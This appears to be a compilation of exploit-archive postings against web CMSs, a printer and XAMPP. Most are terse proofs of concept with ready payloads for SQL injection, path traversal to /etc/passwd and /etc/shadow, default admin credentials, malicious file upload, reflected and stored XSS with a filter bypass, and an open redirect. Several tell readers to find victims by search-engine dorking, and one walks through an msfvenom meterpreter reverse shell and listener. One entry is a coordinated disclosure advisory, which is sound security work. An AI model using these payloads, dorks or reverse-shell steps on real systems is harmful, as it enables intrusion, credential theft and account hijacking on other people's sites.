<pre><code>====================================================================================================================================<br />| # Title : Nedal CMS 1.2 Sql injection vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.sanapix.com/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : link.asp?id=6 <br /><br />[+] http://target_site/new/banner/link.asp?id=6 (inject her)<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>=================================================================================================<br />| # Title : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Dork : طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) ویرایش 3.4.6 |<br />=================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd<br /><br />[+] http://127.0.0.1/itjdconfir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd<br /><br /><br />====Greetings to :===================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=====================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ARTISTRY LIMITED LMS v 0.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.artistrybd.net/ | <br />| # Dork : "Developed By ARTISTRY LIMITED" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Appears to leave a default administrative account in place post installation.<br /><br />[+] Use Payload : user & pass = admin<br /><br />[+] https://127.0.0.1/mother-earthnet/apanel/admin/index.php<br /><br /> <br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Architect - HTML and Site Builder V 2.2.3 Remote File Upload vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla Firefox 114.0.1 (64 bits) | <br />| # Vendor : https://codecanyon.net/item/architect-html-and-site-builder/9957269 | <br />| # Dork : "Our award-winning templates are the most beautiful way to present your ideas online." |<br />====================================================================================================================================<br /><br />[+] P0C : <br /><br />[+] The script is based on Laravel framework so you can apply the vulnerability for the framework<br /><br /> https://dl.packetstormsecurity.net/2301-exploits/laravel9470-disclose.txt<br /> <br />[-] XSS via file upload :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register as a member of the target site .<br /><br />[+] After registering, log in and go to /account/settings .<br /><br />[+] path : https://builder.vebto.com/storage/avatars/9SCDIW0ntFJYqaP9IfrOqhJfzNoyukqmbEOtJxH8.svg <br /><br />[-] Unrestricted File Upload :<br /><br />[+] Go to ( Dashboard/Projects/New)to create a new project or Choose a template for your project .<br /><br />[+] Choose Edit Image and upload your malicious file .<br /><br />[+] path : https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/ogSIFm8ztsQv4BBEy9Ci96utafSBsu45oe1RhL3y.htm<br /><br /> https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/kNHGCajolk2LcxsEZq8Q5sGn9p7Pt7gO5nOO1zwz.txt<br /><br /> https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/50otMfIHgIlJz3OFyuBMjeOSKaXs9a49YLZuaMlK.jpg<br /> <br /> https://spiritbuilder.app/storage/projects/26/7u3ps1joxTO0o1e3jZYfvb3klddh3GFzS1dh/images/kc4FLhcYIWBq7AhOHTpxWwjPxwKRe4vX8nmLBahh.php<br /><br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ArabInfotech L.L.C CMS v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://reliancerecruiters.com | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use payload : /contactus.php?msg=Thank%2520you%2520for%2520your%2520e-mail.%2520We%2520will%2520get%2520back%2520to%2520you%2520soon'%22()%26%25<acx><ScRiPt%20>prompt(/cxsecutiry/)</ScRiPt><br /><br />[+] http://127.0.0.1/reliancerecruiterscom/contactus.php?msg=Thank%2520you%2520for%2520your%2520e-mail.%2520We%2520will%2520get%2520back%2520to%2520you%2520soon%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/cxsecurity/)%3C/ScRiPt%3E<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: XAMPP 8.2.4 - Unquoted Path<br /># Date: 07/2023<br /># Exploit Author: Andrey Stoykov<br /># Version: 8.2.4<br /># Software Link:<br />https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe<br /># Tested on: Windows Server 2022<br /># Blog: http://msecureltd.blogspot.com/<br /><br /><br />Steps to Exploit:<br /><br />1. Search for unquoted paths<br />2. Generate meterpreter shell<br />3. Copy shell to XAMPP directory replacing "mysql.exe"<br />4. Exploit by double clicking on shell<br /><br /><br />C:\Users\astoykov>wmic service get name,displayname,pathname,startmode<br />|findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />mysql<br /> mysql<br />C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini<br />mysql Auto<br /><br /><br /><br />// Generate shell<br />msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444<br />-f exe -o mysql.exe<br /><br /><br />// Setup listener<br />msf6 > use exploit/multi/handler<br />msf6 exploit(multi/handler) > set lhost 192.168.1.13<br />msf6 exploit(multi/handler) > set lport 4443<br />msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp<br />msf6 exploit(multi/handler) > run<br /><br /><br />msf6 exploit(multi/handler) > run<br /><br />[*] Started reverse TCP handler on 192.168.1.13:4443<br />[*] Sending stage (175686 bytes) to 192.168.1.11<br />[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686)<br />at 2023-07-08 03:59:40 -0700<br /><br /><br />meterpreter > getuid<br />Server username: WIN-5PT4K404NLO\astoykov<br />meterpreter > getpid<br />Current pid: 4724<br />meterpreter > shell<br />Process 5884 created.<br />Channel 1 created.<br />Microsoft Windows [Version 10.0.20348.1]<br />(c) Microsoft Corporation. All rights reserved.<br />[...]<br />C:\xampp\mysql\bin>dir<br />dir<br /> Volume in drive C has no label.<br /> Volume Serial Number is 80B5-B405<br /><br /> Directory of C:\xampp\mysql\bin<br />[...]<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : http://articart-demo.livelyworks.net/ │<br />│ Vendor : livelyworks │<br />│ Software : Articart 2.0.1 │<br />│ Vuln Type: Reflected XSS - Open Redirect using base64 Encoding │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## RXSS<br /><br />Path: /items/search<br /><br />GET 'search_term' parameter is vulnerable to RXSS<br /><br />https://website/items/search?search_term=123zr77l%22%3e%3cscript%3ealert(1)%3c%2fscript%3esadj4<br /><br /><br /><br />## Open Redirect<br /><br />An Attacker can use it to redirect a victim to an arbitrary website. This is a powerful tool in<br />phishing campaigns, as it allows hiding the malicious webpage behind a link<br /><br /><br />Path: /change-language/de_DE<br /><br />GET 'redirectTo' parameter is vulnerable to Open Redirect using base64 encoding<br /><br />https://website/change-language/de_DE?redirectTo=aHR0cHM6Ly93d3cuZXZpbC5jb20v<br /><br />aHR0cHM6Ly93d3cuZXZpbC5jb20v = https://www.evil.com/<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230705-0 ><br />=======================================================================<br /> title: Path traversal bypass & Denial of service<br /> product: Kyocera TASKalfa 4053ci printer<br /> vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561<br /> fixed version: 2VG_S000.002.574<br /> CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261<br /> impact: High<br /> homepage: https://global.kyocera.com<br /> found: 2022-12-13<br /> by: Stefan Michlits (Office Vienna)<br /> Gorazd Jank (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Kyocera Document Solutions is leading the digital shift driving productivity<br />and growth in the printing industry. We offer a range of exciting new options<br />that draw on the combined resources of the Kyocera Group."<br /><br />Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends Kyocera customers to install the latest updates.<br /><br />Furthermore, an in-depth security analysis performed by security professionals<br />is highly advised, as the software may be affected from other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Path Traversal - Bypass (CVE-2023-34259)<br />A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06.<br />The previous exploit can be found at: https://www.exploit-db.com/exploits/48561<br />Kyocera has fixed the vulnerability. It was not possible to access arbitrary<br />files using the public exploit. However, SEC Consult have found a bypass to<br />exploit this vulnerability again and access arbitrary files. Due to the fact<br />that the web service is running as the user root, it was possible to access all<br />files (e.g. /etc/shadow) on the device.<br /><br />2) Denial-of-Service - Web Interface (CVE-2023-34260)<br />The denial-of-service vulnerability is related to the path traversal<br />vulnerability. Instead of requesting a file, a directory will be requested.<br />Once the request is sent to the web service running on TCP port 443, the web<br />service will become unresponsive and must be restarted.<br /><br />3) User Enumeration (CVE-2023-34261)<br />The login function on the web service running on TCP port 443 is prone to a<br />user enumeration vulnerability. The login function will return different<br />responses, whether the username is valid or not.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Path Traversal - Bypass (CVE-2023-34259)<br />Previously, a security researcher has discovered an unauthenticated directory<br />traversal vulnerability in the web service running on port 443. The following<br />payload was used to access arbitrary files:<br /><br />https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm<br /><br />This vulnerability is fixed in the current version. It was not possible to<br />access arbitrary files using the above payload. However, the vulnerability was<br />not fixed correctly. SEC Consult identified a bypass to exploit this<br />vulnerability again.<br /><br />Once the ../ sequences will be URL encoded, it is possible to bypass the fix<br />and access arbitrary files. The following payload can be used to access the<br />file /etc/passwd:<br /><br />https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm<br /><br />The response containing the contents of the file /etc/passwd can be seen<br />in the following paragraph.<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Content-Length: 770<br />Accept-Encoding: identity<br />Server: KM-MFP-http/V0.0.1<br />Content-Type: text/html<br />X-Frame-Options: SAMEORIGIN<br /><br />root:x:0:0:root:/root:/bin/sh<br />daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />bin:x:2:2:bin:/bin:/bin/sh<br />sys:x:3:3:sys:/dev:/bin/sh<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/bin/sh<br />man:x:6:12:man:/var/cache/man:/bin/sh<br />lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />mail:x:8:8:mail:/var/mail:/bin/sh<br />news:x:9:9:news:/var/spool/news:/bin/sh<br />uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />proxy:x:13:13:proxy:/bin:/bin/sh<br />www-data:x:33:33:www-data:/var/www:/bin/sh<br />backup:x:34:34:backup:/var/backups:/bin/sh<br />list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false<br />-------------------------------------------------------------------------------<br /><br />Also, it was possible to access the file /etc/shadow. The following payload can<br />be used:<br /><br />https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm<br /><br />The output containing the content of the file /etc/shadow as it can be seen in<br />the following paragraph.<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Content-Length: 401<br />Accept-Encoding: identity<br />Server: KM-MFP-http/V0.0.1<br />Content-Type: text/html<br />X-Frame-Options: SAMEORIGIN<br /><br />root:$1$tfE2pkl/$O8uDq*************bSH.:11029::::::<br />daemon:*:11029::::::<br />bin:*:11029::::::<br />sys:*:11029::::::<br />sync:*:11029::::::<br />games:*:11029::::::<br />man:*:11029::::::<br />lp:*:11029::::::<br />mail:*:11029::::::<br />news:*:11029::::::<br />uucp:*:11029::::::<br />proxy:*:11029::::::<br />www-data:*:11029::::::<br />backup:*:11029::::::<br />list:*:11029::::::<br />irc:*:11029::::::<br />gnats:*:11029::::::<br />nobody:*:11029::::::<br />sshd:x:11029::::::<br />-------------------------------------------------------------------------------<br />As the web service is running as the user root it was possible to access the<br />/etc/shadow file or the file has set the wrong permissions.<br /><br />Based on previous security assessments of Kyocera printers, it is likely that<br />the service is running as the user root.<br /><br /><br />2) Denial-of-Service - Web Interface (CVE-2023-34260)<br />To trigger the DoS attack it is sufficient to navigate to the URL:<br /><br />https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm<br /><br />Once the request is sent to the web service, the web service will become<br />unresponsive.<br /><br />This attack is related to the path traversal vulnerability. The difference is<br />that in this case a folder is requested instead of a file. Apparently, this<br />leads to an error condition in the web server causing it to be unresponsive for<br />all users. Other applications offering a web interface (e.g., on port 8083)<br />seem to not be affected by the attack.<br /><br /><br />3) User Enumeration (CVE-2023-34261)<br />The user enumeration is located in the login functionality of the web<br />interface. Submitting an existing username will result in a different server<br />response than submitting an incorrect username. This enables attackers to<br />enumerate existing users by submitting potential usernames till a different<br />response is gathered. In this case, it does not matter whether the transmitted<br />password is correct or not. The gathered information could be used to better<br />search for default passwords or custom passwords inside of public password<br />leaks.<br />In case, the username does not exist, the response will return<br />"Login-Benutzername oder Passwort falsch.", on the other hand, if the<br />username exists the response contains "Sie können sich nicht einloggen."<br /><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following product has been tested:<br />* Kyocera TASKalfa 4053ci<br /><br />All versions older than "2VG_S000.002.561" are vulnerable according to the vendor.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT<br /> Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html<br /> (it seems only the Japanese website shows the email information)<br />2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt@gp.kyocera.jp<br />2023-03-02: Contacting the vendor again, due to no response.<br />2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory.<br />2023-03-13: Sending security advisory PGP-encrypted.<br />2023-04-19: Vendor response, vulnerabilities confirmed.<br />2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be<br /> released on 2023-05-26.<br />2023-05-22: Informing vendor that we will request CVE numbers, asking for<br /> information about affected & fixed version numbers.<br />2023-05-24: Vendor provides version information.<br />2023-06-02: Sending CVE numbers to vendor, asking for link to patch download.<br />2023-06-05: Vendor provides download information.<br />2023-07-05: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provided the following download information:<br /><br />There are two ways to update the firmware of our products.<br />* One is to contact the shop of purchase and update the firmware from a service person.<br />* The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions<br /> Global website in your country, you can download this tool and latest firmware.<br /> Then you update the firmware yourself.<br /> See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci"<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Michlits, G. Jank / @2023<br /><br /></code></pre>
<pre><code># Exploit Title: Atlas Business Directory Listing 2.13 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 09/07/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/atlas/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /atlas/home/filter_listings<br /><br />GET parameter 'price-range' is vulnerable to XSS<br /><br />https://website/atlas/home/filter_listings?category=family-style&&amenity=good-for-kids&&city=marseille&&price-range=790[XSS]&&video=1&&status=open<br /><br /><br />Path: /atlas/home/search<br /><br />GET parameter 'search_string' is vulnerable to XSS<br /><br />https://website/atlas/home/search?search_string=[XSS]&selected_city_id=&selected_category_id=11<br /><br /><br />Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script> <br />XSS Filter Bypass : "><script>alert(1)</script><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Ekushey Project Manager CRM 5.0 - Stored XSS<br /># Exploit Author: CraCkEr<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/ekushey/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br /><br />## Description<br /><br />Allow Attacker to inject malicious code into website, give ability to steal sensitive<br />information, manipulate data, and launch additional attacks.<br /><br /><br /><br />Path: /ekushey/index.php/client/message/message_read/xxxxxxxx[random-msg-hash]<br /><br />POST parameter 'message' is vulnerable to XSS<br /><br /><br />-----------------------------------------------<br />POST /ekushey/index.php/client/message/send_reply/8c8936d3 HTTP/2<br /><br />-----------------------------------------------<br />Content-Disposition: form-data; name="message"<br /><br /><script>alert(1)</script><br />-----------------------------------------------<br /><br /><br /><br />## Steps to Reproduce:<br /><br />1. Login as (Client)<br />2. Go to [Message] on this Path: https://website/ekushey/index.php/client/message<br />3. Select any Person to MSG (Clients or ADMINS]<br />4. Inject your XSS Payload in [Replay Message]<br />5. Send<br /><br />6. XSS Fired on Local Browser<br /><br />7. When ADMIN visit [Dashboard] or any section in Administration Panel on this Path : https://website/ekushey/index.php/admin/dashboard<br />8. XSS Will Fire and Executed on his Browser<br /><br /><br /><br />[-] Done<br /></code></pre>